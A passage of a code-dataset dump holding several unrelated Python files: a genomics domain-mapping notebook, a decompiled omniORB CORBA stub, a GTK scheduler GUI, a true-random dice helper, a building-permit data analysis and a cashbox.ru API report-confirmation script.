A','end A','barcode A','score A','strand A','chrom B','start B','end B','barcode B','score B','strand B','overlap'])\nfrags_intersected_collapsed = frags_intersected_df.sort_values('score B',ascending=False).drop_duplicates(['chrom A', 'start A','end A']).drop_duplicates(['chrom B','start B','end B']).sort_index()\nfrags_intersected_collapsed.head()\n\n\n# In[21]:\n\n\nfrags_collapsed = frags_intersected_collapsed.iloc[:,np.arange(6,12)]\nfrags_collapsed.columns = ['chrom','start','end','barcode','score','strand']\nfrags_collapsed.head()\n\n\n# In[22]:\n\n\n# Merging our frags_clustered dataset with the fragment_domains dataset to map domain information onto our clustered fragments\nfrag_domain_collapsed = pd.merge(frags_collapsed, fragment_domains, left_on=['barcode'],\n right_on=['barcode'], how='left')\nfrag_domain_collapsed = frag_domain_collapsed.drop(['strand_y','score_y','chrom_y','fragStart','fragEnd'], axis=1)\nfrag_domain_collapsed\n\n\n# In[23]:\n\n\n#This seemed to add some rows; checking that the additional rows are because some fragments contained more than one domain\npd.concat(g for _, g in frag_domain_collapsed.groupby(\"barcode\") if len(g) > 1).head()\n\n\n# In[24]:\n\n\n# Loading the joint fragment-mle-peak dataset to map mle peak data onto our frag_domain_collapsed dataset \nmlep = pd.read_csv('joint-frag-mle-peak.csv')\nmlep.head()\n\n\n# In[25]:\n\n\n# Functions that process fragment data from the mlep dataset and returns its individual components (chromosome, start, end, strand)\ndef fragChrom(row):\n return re.search(\"chr\\d*\", row['frag']).group()\n\ndef fragStart(row):\n return int(re.search(\":\\d*\", row['frag']).group()[1:])\n\ndef fragEnd(row):\n return int(re.search(\"-\\d*\", row['frag']).group()[1:])\n\ndef fragStrand(row):\n return re.search(\"\\(.\\)\", row['frag']).group()\n\n\n# In[26]:\n\n\nmlep['chrom'] = mlep.apply(fragChrom, axis=1)\nmlep['start'] = mlep.apply(fragStart, axis=1)\nmlep['end'] = mlep.apply(fragEnd, axis=1)\nmlep['strand'] = mlep.apply(fragStrand, axis=1)\nmlep = mlep.drop('frag', axis=1)\nmlep\n\n\n# In[27]:\n\n\n# Merging the frag_domain_collapsed dataset with our mlep dataset to map on mlep data to our fragments\nfrag_domain_mlep = pd.merge(frag_domain_collapsed, mlep, left_on=['chrom_x','start','end'], right_on=['chrom','start','end'], how='left')\nfrag_domain_mlep = frag_domain_mlep.drop('strand', axis=1).dropna(subset=['mlePeak'])\nfrag_domain_mlep\n\n\n# In[28]:\n\n\nfrag_domain_mlep.to_csv('frag_domain_mlep.csv')\n\n\n# In[29]:\n\n\n# Finding the occurence of domains in the frag_domain_mlep dataset\ndomain_occurence_groups = frag_domain_mlep.groupby(['hmm name'])\ndomain_occurence = pd.DataFrame()\ndomain_occurence['domain'] = domain_occurence_groups.groups\ndomain_occurence['count'] = domain_occurence_groups.size()\ndomain_occurence = domain_occurence.reset_index().drop('index', axis=1)\ndomain_occurence.sort_values('count', ascending=False).head()\n\n\n# In[30]:\n\n\ndef mannwhitney(row):\n domain = row['domain']\n with_domain = frag_domain_mlep.loc[frag_domain_mlep['hmm name'] == domain]\n wo_domain = frag_domain_mlep.loc[frag_domain_mlep['hmm name'] != domain]\n return stats.mannwhitneyu(with_domain['mlePeak'], wo_domain['mlePeak'], alternative='two-sided')\n\n\n# In[31]:\n\n\ndomains_totest = domain_occurence.loc[domain_occurence['count'] >= 2].reset_index()\ntests = pd.DataFrame(domains_totest.apply(mannwhitney, axis=1).tolist())\ndomain_tests = domains_totest.join(tests).drop('index', axis=1)\ndomain_tests\n\n\n# In[34]:\n\n\ndef get_mlep(row):\n domain = row['domain']\n frag = frag_domain_mlep.loc[frag_domain_mlep['hmm name'] == domain]\n return np.mean(frag['mlePeak'])\n\n\n# In[35]:\n\n\nvalids = domain_tests.loc[domain_tests['pvalue'] <= .05]\nmleps = valids.apply(get_mlep, axis=1)\nvalids['mlePeak'] = mleps\nvalids = valids.sort_values('mlePeak', axis=0)\nvalids\n\n\n# In[36]:\n\n\nvalids.reset_index().to_csv('domain_mleps.csv')\n\n\n# In[37]:\n\n\n# Dropping duplicated fragments based on their start, end, and strand\nfrags_full = fragments.to_dataframe()\nfrags_full = frags_full.drop_duplicates(['start', 'end', 'strand'])\nfrags_full.shape\n\n\n# In[38]:\n\n\n# Turning the fragments dataframe into a BedTool for intersecting below\nfrags_full_bed = pybedtools.BedTool.from_dataframe(frags_full)\nfrags_full_bed.head()\n\n\n# In[39]:\n\n\n# Loading the ANNOTATED GENOME dataset as a dataframe\nannotations = pybedtools.BedTool('saccharomyces_cerevisiae.bed').to_dataframe()\nannotations = annotations.drop(['score', 'thickStart', 'thickEnd', 'itemRgb', 'blockCount', 'blockSizes', 'blockStarts'], axis=1)\nannotations_bed = pybedtools.BedTool.from_dataframe(annotations)\nannotations.head()\n\n\n# In[40]:\n\n\n# Using the intersect tool to attach gene coordinates onto the fragment dataset\nfrags_coordinates = frags_full_bed.intersect(annotations_bed, wo=True, nonamecheck=True).to_dataframe()\nfrags_coordinates.columns = ['chrom', 'fragStart', 'fragEnd', 'barcode', 'score', 'strand', 'chrom2', 'geneStart', 'geneEnd', 'geneName', 'strand2', 'overlap']\nfrags_coordinates = frags_coordinates.drop(['chrom2', 'strand2'], axis=1)\nprint(frags_coordinates.shape)\nfrags_coordinates.head()\n\n\n# In[41]:\n\n\n# Applying findProteinStart and findProteinEnd functions to attach protein coordinates onto frags_collapsed_coordinates\nfrags_coordinates['proteinStart'] = frags_coordinates.apply(findProteinStart, axis=1)\nfrags_coordinates['proteinEnd'] = frags_coordinates.apply(findProteinEnd, axis=1)\nfrags_coordinates.head()\n\n\n# In[42]:\n\n\nfrags_coordinates.to_csv('fragment-protein-coordinates_updatedALL.csv')\n\n\n# In[43]:\n\n\nmlep.head()\n\n\n# In[54]:\n\n\n# Merging the frag_domain_collapsed dataset with our mlep dataset to map on mlep data to our fragments\nfrags_coord_mlep = pd.merge(frags_coordinates, mlep, left_on=['chrom','fragStart','fragEnd'], right_on=['chrom','start','end'], how='left')\n#frags_coord_mlep_NA = frags_coord_mlep\nfrags_coord_mlep = frags_coord_mlep.dropna(subset=['mlePeak'])\nfrags_coord_mlep.shape\n\n\n# In[55]:\n\n\nfrags_coord_mlep.to_csv('frags_coordinates_mlep.csv')\nfrags_coord_mlep_NA.to_csv('frags_coordinates_NAmlep.csv')\n\n","sub_path":"fragment_domains_Pfam.py","file_name":"fragment_domains_Pfam.py","file_ext":"py","file_size_in_byte":11990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"415044481","text":"# uncompyle6 version 3.6.7\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: ./CosTimerEvent_idl.py\n# Compiled at: 2018-07-20 10:03:27\n# Size of source mod 2**32: 9940 bytes\nimport omniORB, _omnipy\nfrom omniORB import CORBA, PortableServer\n_0_CORBA = CORBA\n_omnipy.checkVersion(4, 2, __file__, 1)\ntry:\n property\nexcept NameError:\n\n def property(*args):\n pass\n\n\nimport TimeBase_idl\n_0_TimeBase = omniORB.openModule('TimeBase')\n_0_TimeBase__POA = omniORB.openModule('TimeBase__POA')\nimport CosTime_idl\n_0_CosTime = omniORB.openModule('CosTime')\n_0_CosTime__POA = omniORB.openModule('CosTime__POA')\nimport CosEventComm_idl\n_0_CosEventComm = omniORB.openModule('CosEventComm')\n_0_CosEventComm__POA = omniORB.openModule('CosEventComm__POA')\n__name__ = 'CosTimerEvent'\n_0_CosTimerEvent = omniORB.openModule('CosTimerEvent', '/tmp/corba/omni/share/idl/omniORB/COS/CosTimerEvent.idl')\n_0_CosTimerEvent__POA = omniORB.openModule('CosTimerEvent__POA', '/tmp/corba/omni/share/idl/omniORB/COS/CosTimerEvent.idl')\n_0_CosTimerEvent.TTAbsolute = omniORB.EnumItem('TTAbsolute', 0)\n_0_CosTimerEvent.TTRelative = omniORB.EnumItem('TTRelative', 1)\n_0_CosTimerEvent.TTPeriodic = omniORB.EnumItem('TTPeriodic', 2)\n_0_CosTimerEvent.TimeType = omniORB.Enum('IDL:omg.org/CosTimerEvent/TimeType:1.0', (_0_CosTimerEvent.TTAbsolute, _0_CosTimerEvent.TTRelative, _0_CosTimerEvent.TTPeriodic))\n_0_CosTimerEvent._d_TimeType = (\n omniORB.tcInternal.tv_enum, _0_CosTimerEvent.TimeType._NP_RepositoryId, 'TimeType', _0_CosTimerEvent.TimeType._items)\n_0_CosTimerEvent._tc_TimeType = omniORB.tcInternal.createTypeCode(_0_CosTimerEvent._d_TimeType)\nomniORB.registerType(_0_CosTimerEvent.TimeType._NP_RepositoryId, _0_CosTimerEvent._d_TimeType, _0_CosTimerEvent._tc_TimeType)\n_0_CosTimerEvent.ESTimeSet = omniORB.EnumItem('ESTimeSet', 0)\n_0_CosTimerEvent.ESTimeCleared = omniORB.EnumItem('ESTimeCleared', 1)\n_0_CosTimerEvent.ESTriggered = omniORB.EnumItem('ESTriggered', 2)\n_0_CosTimerEvent.ESFailedTrigger = omniORB.EnumItem('ESFailedTrigger', 3)\n_0_CosTimerEvent.EventStatus = omniORB.Enum('IDL:omg.org/CosTimerEvent/EventStatus:1.0', (_0_CosTimerEvent.ESTimeSet, _0_CosTimerEvent.ESTimeCleared, _0_CosTimerEvent.ESTriggered, _0_CosTimerEvent.ESFailedTrigger))\n_0_CosTimerEvent._d_EventStatus = (\n omniORB.tcInternal.tv_enum, _0_CosTimerEvent.EventStatus._NP_RepositoryId, 'EventStatus', _0_CosTimerEvent.EventStatus._items)\n_0_CosTimerEvent._tc_EventStatus = omniORB.tcInternal.createTypeCode(_0_CosTimerEvent._d_EventStatus)\nomniORB.registerType(_0_CosTimerEvent.EventStatus._NP_RepositoryId, _0_CosTimerEvent._d_EventStatus, _0_CosTimerEvent._tc_EventStatus)\n_0_CosTimerEvent.TimerEventT = omniORB.newEmptyClass()\n\nclass TimerEventT(omniORB.StructBase):\n _NP_RepositoryId = 'IDL:omg.org/CosTimerEvent/TimerEventT:1.0'\n\n def __init__(self, utc, event_data):\n self.utc = utc\n self.event_data = event_data\n\n\n_0_CosTimerEvent.TimerEventT = TimerEventT\n_0_CosTimerEvent._d_TimerEventT = (omniORB.tcInternal.tv_struct, TimerEventT, TimerEventT._NP_RepositoryId, 'TimerEventT', 'utc', omniORB.typeMapping['IDL:omg.org/TimeBase/UtcT:1.0'], 'event_data', omniORB.tcInternal.tv_any)\n_0_CosTimerEvent._tc_TimerEventT = omniORB.tcInternal.createTypeCode(_0_CosTimerEvent._d_TimerEventT)\nomniORB.registerType(TimerEventT._NP_RepositoryId, _0_CosTimerEvent._d_TimerEventT, _0_CosTimerEvent._tc_TimerEventT)\ndel TimerEventT\n_0_CosTimerEvent._d_TimerEventHandler = (\n omniORB.tcInternal.tv_objref, 'IDL:omg.org/CosTimerEvent/TimerEventHandler:1.0', 'TimerEventHandler')\nomniORB.typeMapping['IDL:omg.org/CosTimerEvent/TimerEventHandler:1.0'] = _0_CosTimerEvent._d_TimerEventHandler\n_0_CosTimerEvent.TimerEventHandler = omniORB.newEmptyClass()\n\nclass TimerEventHandler:\n _NP_RepositoryId = _0_CosTimerEvent._d_TimerEventHandler[1]\n\n def __init__(self, *args, **kw):\n raise RuntimeError('Cannot construct objects of this type.')\n\n _nil = CORBA.Object._nil\n\n\n_0_CosTimerEvent.TimerEventHandler = TimerEventHandler\n_0_CosTimerEvent._tc_TimerEventHandler = omniORB.tcInternal.createTypeCode(_0_CosTimerEvent._d_TimerEventHandler)\nomniORB.registerType(TimerEventHandler._NP_RepositoryId, _0_CosTimerEvent._d_TimerEventHandler, _0_CosTimerEvent._tc_TimerEventHandler)\nTimerEventHandler._d__get_status = ((), (omniORB.typeMapping['IDL:omg.org/CosTimerEvent/EventStatus:1.0'],), None)\nTimerEventHandler._d_time_set = ((), (omniORB.tcInternal.tv_boolean, omniORB.typeMapping['IDL:omg.org/CosTime/UTO:1.0']), None)\nTimerEventHandler._d_SetTimer = (\n (\n omniORB.typeMapping['IDL:omg.org/CosTimerEvent/TimeType:1.0'], omniORB.typeMapping['IDL:omg.org/CosTime/UTO:1.0']), (), None)\nTimerEventHandler._d_cancel_timer = ((), (omniORB.tcInternal.tv_boolean,), None)\nTimerEventHandler._d_set_data = ((omniORB.tcInternal.tv_any,), (), None)\n\nclass _objref_TimerEventHandler(CORBA.Object):\n _NP_RepositoryId = TimerEventHandler._NP_RepositoryId\n\n def __init__(self, obj):\n CORBA.Object.__init__(self, obj)\n\n def _get_status(self, *args):\n return self._obj.invoke('_get_status', _0_CosTimerEvent.TimerEventHandler._d__get_status, args)\n\n status = property(_get_status)\n\n def time_set(self, *args):\n return self._obj.invoke('time_set', _0_CosTimerEvent.TimerEventHandler._d_time_set, args)\n\n def SetTimer(self, *args):\n return self._obj.invoke('SetTimer', _0_CosTimerEvent.TimerEventHandler._d_SetTimer, args)\n\n def cancel_timer(self, *args):\n return self._obj.invoke('cancel_timer', _0_CosTimerEvent.TimerEventHandler._d_cancel_timer, args)\n\n def set_data(self, *args):\n return self._obj.invoke('set_data', _0_CosTimerEvent.TimerEventHandler._d_set_data, args)\n\n\nomniORB.registerObjref(TimerEventHandler._NP_RepositoryId, _objref_TimerEventHandler)\n_0_CosTimerEvent._objref_TimerEventHandler = _objref_TimerEventHandler\ndel TimerEventHandler\ndel _objref_TimerEventHandler\n__name__ = 'CosTimerEvent__POA'\n\nclass TimerEventHandler(PortableServer.Servant):\n _NP_RepositoryId = _0_CosTimerEvent.TimerEventHandler._NP_RepositoryId\n _omni_op_d = {'_get_status':_0_CosTimerEvent.TimerEventHandler._d__get_status, \n 'time_set':_0_CosTimerEvent.TimerEventHandler._d_time_set, 'SetTimer':_0_CosTimerEvent.TimerEventHandler._d_SetTimer, 'cancel_timer':_0_CosTimerEvent.TimerEventHandler._d_cancel_timer, 'set_data':_0_CosTimerEvent.TimerEventHandler._d_set_data}\n\n\nTimerEventHandler._omni_skeleton = TimerEventHandler\n_0_CosTimerEvent__POA.TimerEventHandler = TimerEventHandler\nomniORB.registerSkeleton(TimerEventHandler._NP_RepositoryId, TimerEventHandler)\ndel TimerEventHandler\n__name__ = 'CosTimerEvent'\n_0_CosTimerEvent._d_TimerEventService = (\n omniORB.tcInternal.tv_objref, 'IDL:omg.org/CosTimerEvent/TimerEventService:1.0', 'TimerEventService')\nomniORB.typeMapping['IDL:omg.org/CosTimerEvent/TimerEventService:1.0'] = _0_CosTimerEvent._d_TimerEventService\n_0_CosTimerEvent.TimerEventService = omniORB.newEmptyClass()\n\nclass TimerEventService:\n _NP_RepositoryId = _0_CosTimerEvent._d_TimerEventService[1]\n\n def __init__(self, *args, **kw):\n raise RuntimeError('Cannot construct objects of this type.')\n\n _nil = CORBA.Object._nil\n\n\n_0_CosTimerEvent.TimerEventService = TimerEventService\n_0_CosTimerEvent._tc_TimerEventService = omniORB.tcInternal.createTypeCode(_0_CosTimerEvent._d_TimerEventService)\nomniORB.registerType(TimerEventService._NP_RepositoryId, _0_CosTimerEvent._d_TimerEventService, _0_CosTimerEvent._tc_TimerEventService)\nTimerEventService._d_register = (\n (\n omniORB.typeMapping['IDL:omg.org/CosEventComm/PushConsumer:1.0'], omniORB.tcInternal.tv_any), (omniORB.typeMapping['IDL:omg.org/CosTimerEvent/TimerEventHandler:1.0'],), None)\nTimerEventService._d_unregister = ((omniORB.typeMapping['IDL:omg.org/CosTimerEvent/TimerEventHandler:1.0'],), (), None)\nTimerEventService._d_event_time = ((omniORB.typeMapping['IDL:omg.org/CosTimerEvent/TimerEventT:1.0'],), (omniORB.typeMapping['IDL:omg.org/CosTime/UTO:1.0'],), None)\n\nclass _objref_TimerEventService(CORBA.Object):\n _NP_RepositoryId = TimerEventService._NP_RepositoryId\n\n def __init__(self, obj):\n CORBA.Object.__init__(self, obj)\n\n def register(self, *args):\n return self._obj.invoke('register', _0_CosTimerEvent.TimerEventService._d_register, args)\n\n def unregister(self, *args):\n return self._obj.invoke('unregister', _0_CosTimerEvent.TimerEventService._d_unregister, args)\n\n def event_time(self, *args):\n return self._obj.invoke('event_time', _0_CosTimerEvent.TimerEventService._d_event_time, args)\n\n\nomniORB.registerObjref(TimerEventService._NP_RepositoryId, _objref_TimerEventService)\n_0_CosTimerEvent._objref_TimerEventService = _objref_TimerEventService\ndel TimerEventService\ndel _objref_TimerEventService\n__name__ = 'CosTimerEvent__POA'\n\nclass TimerEventService(PortableServer.Servant):\n _NP_RepositoryId = _0_CosTimerEvent.TimerEventService._NP_RepositoryId\n _omni_op_d = {'register':_0_CosTimerEvent.TimerEventService._d_register, \n 'unregister':_0_CosTimerEvent.TimerEventService._d_unregister, 'event_time':_0_CosTimerEvent.TimerEventService._d_event_time}\n\n\nTimerEventService._omni_skeleton = TimerEventService\n_0_CosTimerEvent__POA.TimerEventService = TimerEventService\nomniORB.registerSkeleton(TimerEventService._NP_RepositoryId, TimerEventService)\ndel TimerEventService\n__name__ = 'CosTimerEvent'\n__name__ = 'CosTimerEvent_idl'\n_exported_modules = ('CosTimerEvent', )","sub_path":"pycfiles/ans_python-0.3.1-py3-none-any/CosTimerEvent_idl.cpython-36.py","file_name":"CosTimerEvent_idl.cpython-36.py","file_ext":"py","file_size_in_byte":9582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"378842061","text":"import gi\ngi.require_version('Gtk', '3.0')\nfrom gi.repository import Gtk\n\nfrom queue.queue import Queue\nfrom processes.NormalProcess import NormalProcess\n\nclass MainWindow(Gtk.Grid):\n def __init__(self, main_window):\n Gtk.Grid.__init__(self)\n self.main_window = main_window\n self.set_column_homogeneous = True\n\n self.queue = Queue()\n\n self.set_column_spacing(100)\n\n results_box = Gtk.ListBox()\n self.results_line = Gtk.ListBox()\n results_box.set_border_width(4)\n results_box.add(self.results_line)\n\n schedule_button = Gtk.Button('Schedule')\n schedule_button.connect('clicked', self.schedule)\n\n results_box.set_hexpand(True)\n results_box.add(schedule_button)\n\n self.attach(results_box, 0, 0, 1, 1)\n\n processes_box = Gtk.ListBox()\n self.process_lines = Gtk.ListBox()\n processes_box.add(self.process_lines)\n add_process_button = Gtk.Button('Add Process')\n add_process_button.connect('clicked', self.add_process_dialog)\n\n processes_box.set_hexpand(True)\n processes_box.set_border_width(5)\n processes_box.add(add_process_button)\n\n\n self.attach(processes_box, 3, 0, 1, 1)\n\n self.gantt_chart_box = Gtk.Box()\n self.gantt_chart_box.add(Gtk.Label('GANTT CHART GOES HERE'))\n self.attach(self.gantt_chart_box, 0, 1, 3, 1)\n\n\n def add_process_dialog(self, widget):\n self.dialog = Gtk.Dialog('Add Process', self.main_window)\n dialog_main_window = self.dialog.get_content_area()\n\n\n #Row for the text fields\n first_row = Gtk.Box(spacing=50)\n\n #Row for the Add and Cancel buttons\n second_row = Gtk.Box(spacing=50)\n\n #Row for validation information\n third_row = Gtk.Box(spacing=50)\n\n dialog_main_window.add(first_row)\n dialog_main_window.add(second_row)\n dialog_main_window.add(third_row)\n\n\n #Add the text fields to the first row\n self.process_name_input = Gtk.Entry()\n self.process_name_input.set_text('Process Name')\n\n self.process_time_input = Gtk.Entry()\n self.process_time_input.set_text('4')\n\n self.process_arrival_input = Gtk.Entry()\n self.process_arrival_input.set_text('1')\n\n first_row.pack_start(self.process_name_input, True, True, 0)\n first_row.pack_start(self.process_time_input, True, True, 0)\n first_row.pack_start(self.process_arrival_input, True, True, 0)\n\n\n #Add the buttons to the second row\n\n add_process_button = Gtk.Button('Add')\n add_process_button.connect('clicked', self.validate)\n\n cancel_button = Gtk.Button('Cancel')\n cancel_button.connect('clicked', self.cancel)\n second_row.pack_start(add_process_button, True, True, 0)\n second_row.pack_start(cancel_button, True, True, 0)\n\n\n #Add the validations row\n self.validations = Gtk.Label()\n third_row.pack_start(self.validations, True, True, 0)\n\n self.dialog.show_all()\n\n\n def cancel(self, widget):\n self.dialog.close()\n\n\n def validate(self, widget):\n process_name = self.process_name_input.get_text()\n process_time = self.process_time_input.get_text()\n process_arrival = self.process_arrival_input.get_text()\n\n try:\n process_time = int(process_time)\n process_arrival = int(process_arrival)\n if(process_arrival < 0 and process_time < 0 and process_name is ''):\n raise Exception('')\n self.queue.addProcess(NormalProcess(process_name, process_arrival, process_time))\n except Exception as e:\n self.validations.set_label('The Process Name is Required, and the process arrival and Time should be non-negative integers')\n else:\n self.cancel(widget)\n self.draw_queue()\n\n def draw_queue(self):\n for child in self.process_lines.get_children():\n self.process_lines.remove(child)\n for process in self.queue.processes:\n t = str(process.name) + \" /// \" + str(process.arrival) + \" /// \" + str(process.time)\n self.process_lines.add(Gtk.Label(t))\n self.process_lines.show_all()\n\n\n def schedule(self, widget):\n pass\n\n\n def draw_gantt(self, gantt_chart):\n for child in self.gantt_chart_box.get_children():\n self.gantt_chart_box.remove(child)\n\n for process in gantt_chart.chart:\n l = 'X'\n if process is not None:\n l = process.name\n l = Gtk.Button(l)\n self.gantt_chart_box.add(l)\n self.gantt_chart_box.show_all()\n\n\n\n","sub_path":"schedulers/abstractions/View.py","file_name":"View.py","file_ext":"py","file_size_in_byte":4678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"102187829","text":"import logging\nimport random\nimport asyncio\nfrom asyncio import Queue\n\n# Urandom is used as a backup if your quota is used up.\n# You however have a quota of 200K bits per day with a\n# max(start) of 1M bits.\n# So you probably wont run out\n\nurandom = random.SystemRandom()\n\nfrom .randomwrapy import *\n\nrandom_buffer = dict()\n\n_logger = logging.getLogger(__name__)\n\n\ndef urandom_list(count, max):\n return [urandom.randint(1, max) for _ in range(count)]\n\n\nasync def populate_random_buffer(max, prefetch=None, use_true_random=True):\n \"\"\"\n Populate the random_buffer with random numbers.\n\n If the number is larger than 100, then urandom will be used.\n \"\"\"\n\n num = prefetch if prefetch is not None else 30\n\n if use_true_random:\n try:\n _logger.info('TrueRandom: Fetching {} true Random numbers from 1 to {}'.format(num, max))\n numbers = rnumlistwithreplacement(num, max, 1)\n except NoQuotaError:\n _logger.warning('TrueRandom: Daily quota has run out, using urandom instead')\n numbers = urandom_list(num, max)\n else:\n numbers = urandom_list(num, max)\n\n if str(max) not in random_buffer:\n random_buffer[str(max)] = Queue()\n \n queue = random_buffer[str(max)]\n for value in numbers:\n await queue.put(int(value))\n\n\ndef randint(max, use_true_random=True):\n \"\"\"\n Get a true random number.\n \n If you will be getting a large sum of random numbers, I\n suggest calling prefetch with the amount of numbers\n before collecting them.\n\n the range is [1-max] all inclusive\n\n :param max: the (inclusive) max number to get\n \"\"\"\n index = str(max)\n\n buf = random_buffer.get(index)\n\n if buf is not None and use_true_random is True:\n try:\n ret = buf.get_nowait()\n except asyncio.QueueEmpty:\n ret = urandom_list(1, max)[0]\n else:\n ret = urandom_list(1, max)[0]\n\n return ret, buf is None or buf.qsize() < 10\n","sub_path":"dice_roller/util/truerandom/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"461640907","text":"import operator\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom pandas import Series,DataFrame\nfrom geneview.gwas import qqplot\n\ndb='Building_Permits.csv'\n#读取csv文件,生成data frame\ndata=pd.read_csv(db,low_memory=False)\n#print(data.info())198900*43\n# 定义两类数据:标称型和数值型\nframe1=DataFrame(data,columns=['Permit Type Definition','Permit Number','Permit Creation Date','Block','Lot','Street Number',\n'Street Number Suffix','Street Name','Street Suffix','Unit',\t'Unit Suffix','Description','Current Status'\n,'Current Status Date','Filed Date','Issued Date','Completed Date','First Construction Document Date',\n'Structural Notification','Voluntary Soft-Story Retrofit','Fire Only Permit','Permit Expiration Date',\n'Existing Use','Proposed Use','Plansets','TIDF Compliance','Existing Construction Type',\n'Existing Construction Type Description','Proposed Construction Type','Proposed Construction Type Description',\n'Site Permit','Supervisor District','Neighborhoods - Analysis Boundaries','Zipcode','Location'])\n\nframe2=DataFrame(data,columns=['Number of Existing Stories','Number of Proposed Stories','Estimated Cost','Revised Cost','Existing Units','Proposed Units'])\nname_value=['Number of Existing Stories','Number of Proposed Stories','Estimated Cost','Revised Cost','Existing Units','Proposed Units']\nprint(data.iloc[:10])\n# **Step 1. 数据摘要**\n#\n#对标称属性,给出每个可能取值的频数,value_counts()\nfor i in range(35):\n print('频数为:\\n',frame1.iloc[:,[i]].apply(pd.value_counts),'\\n')\n\n# 数值属性,给出最大、最小、均值、中位数、四分位数及缺失值的个数。\n#用describe()函数获取最大、最小、均值、中位数、四分位数\nstatistics=frame2.describe()\n#统计数值属性的缺失值数量\nstatistics.loc['null']=data.shape[0]-statistics.loc['count']\nprint(statistics)\n\n# **Step 2. 数据可视化 **\n#\n# - 针对数值属性:\n#针对数值属性,绘制直方图,用qq图检验其分布是否为正态分布。绘制盒图,对离群值进行识别\n\n# 直方图\nfig = plt.figure(figsize = (20,11))\ni = 1\nfor item in frame2:\n ax = fig.add_subplot(3, 5, i)\n data[item].plot(kind = 'hist', title = item, ax = ax)\n i += 1\nplt.subplots_adjust(wspace = 0.3, hspace = 0.3)\nfig.savefig('./image1/histogram.png')\nprint('histogram saved at ./image1/histogram.png')\n\n#qq图\nfig = plt.figure(figsize = (20,11))\nax = qqplot(frame2, color=\"#00bb33\", xlabel=\"Expected p-value(-log10)\", ylabel=\"Observed p-value(-log10)\")\nplt.show()\n\n# - 绘制盒图,对离群值进行识别。\n# 盒图\nfig = plt.figure(figsize = (20,12))\ni = 1\nfor item in frame2:\n ax = fig.add_subplot(3, 5, i)\n data[item].plot(kind = 'box')\n i += 1\nfig.savefig('./image1/boxplot.png')\nprint('boxplot saved at ./image1/boxplot.png')\n\n# 处理缺失值\n#\n\n# 将缺失部分剔除\n# 绘制可视化图\nnan_list = pd.isnull(data).any(1).nonzero()[0]\nDataTable_filtrated = data;\nfig = plt.figure(figsize=(20, 15))\nn = 6\n# 对数值属性,绘制直方图\nfor i in frame2:\n ax = fig.add_subplot(3, 5, n)\n\n DataTable_filtrated[i] = DataTable_filtrated[i].dropna() # 删除\n ax.set_title(i)\n data[i].plot(ax=ax, alpha=0.5, kind='hist', label='origin', legend=True)\n DataTable_filtrated[i].plot(ax=ax, alpha=0.5, kind='hist', label='filtrated', legend=True)\n # pyplot.show()\n ax.axvline(data[i].mean(), color='r')\n ax.axvline(DataTable_filtrated[i].mean(), color='b')\n n += 1\nplt.subplots_adjust(wspace=0.3, hspace=0.3)\n# 保存图像和处理后数据\nfig.savefig('./image1/missing_data_delete.png')\nprint('filted_missing_data1 saved at ./image1/missing_data_delete.png')\n\n# 用最高频率值来填补缺失值\n# 绘制可视化图\nDataTable_filtrated = data;\nfig = plt.figure(figsize=(20, 15))\nn = 6\n# 对数值属性,绘制直方图\nfor i in frame2:\n ax = fig.add_subplot(4, 5, n)\n MostFrequentElement = data[i].value_counts().idxmax();\n\n DataTable_filtrated[i] = DataTable_filtrated[i].fillna(value=MostFrequentElement); # 众数填补缺失值\n ax.set_title(i)\n data[i].plot(ax=ax, alpha=0.5, kind='hist', label='origin', legend=True)\n DataTable_filtrated[i].plot(ax=ax, alpha=0.5, kind='hist', label='filtrated', legend=True)\n # pyplot.show()\n ax.axvline(data[i].mean(), color='r')\n ax.axvline(DataTable_filtrated[i].mean(), color='b')\n n += 1\nplt.subplots_adjust(wspace=0.3, hspace=0.3)\n# 保存图像和处理后数据\nfig.savefig('./image1/missing_data_most.png')\nprint('filted_missing_data1 saved at ./image1/missing_data_most.png')\n\n# 通过属性的相关关系来填补缺失值,插值法\n# 绘制可视化图\nDataTable_filtrated = data;\nfig = plt.figure(figsize=(20, 15))\nn = 6\n# 对数值属性,绘制直方图\nfor i in frame2:\n ax = fig.add_subplot(4, 5, n)\n\n DataTable_filtrated[i].interpolate(inplace=True) # 插值\n ax.set_title(i)\n data[i].plot(ax=ax, alpha=0.5, kind='hist', label='origin', legend=True)\n DataTable_filtrated[i].plot(ax=ax, alpha=0.5, kind='hist', label='filtrated', legend=True)\n # pyplot.show()\n ax.axvline(data[i].mean(), color='r')\n ax.axvline(DataTable_filtrated[i].mean(), color='b')\n n += 1\nplt.subplots_adjust(wspace=0.3, hspace=0.3)\n# 保存图像和处理后数据\nfig.savefig('./image1/missing_data_corelation.png')\nprint('filted_missing_data1 saved at ./image1/missing_data_corelation.png')\n\n\n","sub_path":"new1.py","file_name":"new1.py","file_ext":"py","file_size_in_byte":5444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"394876551","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nimport requests\nimport hmac\nimport hashlib\nimport base64\nimport datetime\nfrom time import sleep\n\ndef main():\n url = 'https://cashbox.ru/webapi/v1/user/account/balance'\n result = req(url)\n print('Денег на счете = ', result['balance'])\n url = 'https://cashbox.ru/webapi/v1/task/326354'\n result = req(url)\n print('Денег в задаче = ', result['publishing']['paidTimes'] - result['publishing']['resultsCount'])\n url = 'https://cashbox.ru/webapi/v1/freetask/326354/reports/2'\n result = req(url)\n i = 0\n for id in result:\n url_check = f'https://cashbox.ru/webapi/v1/freetaskreport/{id}/confirm'\n i += 1\n req(url_check)\n #print('Отчет подтвержден = ', url_check)\n print('Подтверждено = ', i)\n\n\ndef req(url):\n PublicKey = b''\n SecretKey = b''\n dt = str(int(datetime.datetime.now().timestamp())) + '000'\n #md5 = base64.b64encode(hashlib.md5(SecretKey).digest())\n plaintStr = f'{PublicKey.decode(\"utf-8\")}:GET:{url}:{dt}:'\n signature = base64.b64encode(\n hmac.new(SecretKey, 